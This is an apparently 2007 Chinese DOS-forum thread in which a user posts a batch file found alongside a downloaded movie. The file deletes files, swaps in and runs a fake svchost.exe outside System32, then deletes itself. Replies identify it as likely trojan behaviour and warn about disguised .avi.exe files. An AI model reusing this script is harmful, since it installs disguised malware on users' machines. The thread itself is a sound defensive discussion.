中国DOS联盟

-- 联合DOS 推动DOS 发展DOS --

联盟域名：www.cn-dos.net 论坛域名：www.cn-dos.net/forum
DOS，代表着自由开放与发展，我们努力起来，学习FreeDOS和Linux的自由开放与GNU精神，共同创造和发展美好的自由与GNU GPL世界吧！

游客: 注册 | 登录 | 命令行 | 搜索 | 上传 | 帮助 »

中国DOS联盟论坛 » DOS批处理 & 脚本技术（批处理室） » 下载电影后发现批处理文件updskl.bat，不明白其意图

English/Chinese Fix Translation

enjoyer
中级用户

部落守望者

积分 351
发帖 140
注册 2006-6-19
状态离线

『楼主』: 下载电影后发现批处理文件updskl.bat，不明白其意图使用 LLM 解释/回答一下

电影文件夹中含有批处理文件updskl.bat，内容如下：
@echo off
:loop
del "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\ver.txt"
del "C:\Program Files\Common Files\System\she.dll"
if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop
C:
cd C:\Program Files\Common Files\System\
ren svchostnew.exe svchost.exe
call "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\updskl.bat"

第一步就强行删除原有的svchost.exe，第二步重命名svchostnew.exe 为svchost.exe然后执行之。看样子是想更新电脑中System夹下的svchost.exe，不明白是什么意图？有没有危险啊。请大家帮忙分析下，谢谢各位！

Last edited by enjoyer on 2007-7-29 at 09:36 PM ]

一切从底层开始

2007-7-29 21:25

查看资料发送邮件发短消息网志 OICQ

OICQ

(363852426)

编辑帖子回复引用回复

wudixin96
银牌会员

积分 1928
发帖 931
注册 2007-1-6
状态离线

『第 2 楼』: 使用 LLM 解释/回答一下

有什么问题吗？

可能是模拟svchost进程吧。

2007-7-29 21:32

查看资料发短消息网志

编辑帖子回复引用回复

enjoyer
中级用户

部落守望者

积分 351
发帖 140
注册 2006-6-19
状态离线

『第 3 楼』: 使用 LLM 解释/回答一下

不知道跟下载的电影文件是什么关系，还有svchost进程我也不了解，会不会影响我系统的稳定性呢？请楼上朋友帮忙分析下，谢谢了。

一切从底层开始

2007-7-29 21:39

查看资料发送邮件发短消息网志 OICQ

OICQ

(363852426)

编辑帖子回复引用回复

slore
铂金会员

积分 5212
发帖 2478
注册 2007-2-8
状态离线

『第 4 楼』: 使用 LLM 解释/回答一下

系统的SVCHOST在SYSTEM32下，那个地方的不是正常的系统文件。

2007-7-29 21:53

查看资料发短消息网志

编辑帖子回复引用回复

BWSkyer
中级用户

我是DOS学者

积分 367
发帖 180
注册 2006-5-14
来自重庆
状态离线

『第 5 楼』: 使用 LLM 解释/回答一下

有点危险吧，不建议运行，感觉是的~~毕竟电影和svchost没有什么关系吧

My blog:左铅右椠上善若水
My team: 519创意团队

2007-7-29 22:09

查看资料发送邮件访问主页发短消息网志 OICQ

OICQ

(309843581)

编辑帖子回复引用回复

enjoyer
中级用户

部落守望者

积分 351
发帖 140
注册 2006-6-19
状态离线

『第 6 楼』: 使用 LLM 解释/回答一下

就怕是自动运行的。如果不自动运行那也没什么好怕的。

一切从底层开始

2007-7-30 00:04

查看资料发送邮件发短消息网志 OICQ

OICQ

(363852426)

编辑帖子回复引用回复

kich
中级用户

积分 397
发帖 168
注册 2006-10-8
状态离线

『第 7 楼』: 使用 LLM 解释/回答一下

我想你那个电影文件可能是假冒的！图标是，但文件最后的后缀不是！
注意，是最后，
会有这样的文件：
001.avi(N多空格).exe
图标是假的

2007-7-30 12:24

查看资料发送邮件发短消息网志

编辑帖子回复引用回复

frankkf
初级用户

积分 88
发帖 43
注册 2007-5-30
状态离线

『第 8 楼』: 使用 LLM 解释/回答一下

楼上说的这个很有可能
建议楼主还是看一下~

2007-7-30 16:47

查看资料发短消息网志

编辑帖子回复引用回复

voiL
中级用户

积分 384
发帖 189
注册 2005-10-19
状态离线

『第 9 楼』: 使用 LLM 解释/回答一下

不知道哈,反正不要去打开它就好了...

2007-7-30 21:30

查看资料发短消息网志

编辑帖子回复引用回复

taoty
中级用户

传说中的菜鸟

积分 275
发帖 112
注册 2005-4-22
状态离线

『第 10 楼』: 使用 LLM 解释/回答一下

这个批处理肯定有问题，svchost.exe路径不正确。

2007-8-2 22:58

查看资料发送邮件发短消息网志 OICQ

OICQ

(356807070)

编辑帖子回复引用回复

jinlizhpc
初级用户

积分 165
发帖 74
注册 2007-1-8
状态离线

『第 11 楼』: 使用 LLM 解释/回答一下

危险性，勿行

2007-8-3 12:45

查看资料发短消息网志

编辑帖子回复引用回复

webjump
初级用户

积分 30
发帖 15
注册 2007-5-26
状态离线

『第 12 楼』: 使用 LLM 解释/回答一下

应该是木马

2007-8-3 17:07

查看资料发送邮件发短消息网志

编辑帖子回复引用回复

enjoyer
中级用户

部落守望者

积分 351
发帖 140
注册 2006-6-19
状态离线

『第 13 楼』: 使用 LLM 解释/回答一下

谢谢大家帮忙！下载的电影文件是真的（.rm格式），可以正常播放。也没有再理会这个批处理文件。不过有没有在电影播放中偷偷运行就不知道了。

一切从底层开始

2007-8-3 21:41

查看资料发送邮件发短消息网志 OICQ

OICQ

(363852426)

编辑帖子回复引用回复

ldr2zjj
初级用户

积分 167
发帖 95
注册 2007-5-6
状态离线

『第 14 楼』: 使用 LLM 解释/回答一下

把那个文件改名了再研究~~

2007-8-7 01:29

查看资料发送邮件发短消息网志

编辑帖子回复引用回复

kingyn
初级用户

积分 32
发帖 21
注册 2007-8-22
状态离线

『第 15 楼』: 使用 LLM 解释/回答一下

svchost.exe是很重要的
楼主应该多点小心

2007-8-27 19:44

查看资料发送邮件发短消息网志

编辑帖子回复引用回复

请注意：您目前尚未注册或登录，请您注册或登录以使用论坛的各项功能，例如发表和回复帖子等。

可打印版本 | 推荐给朋友 | 订阅主题 | 收藏主题

论坛跳转: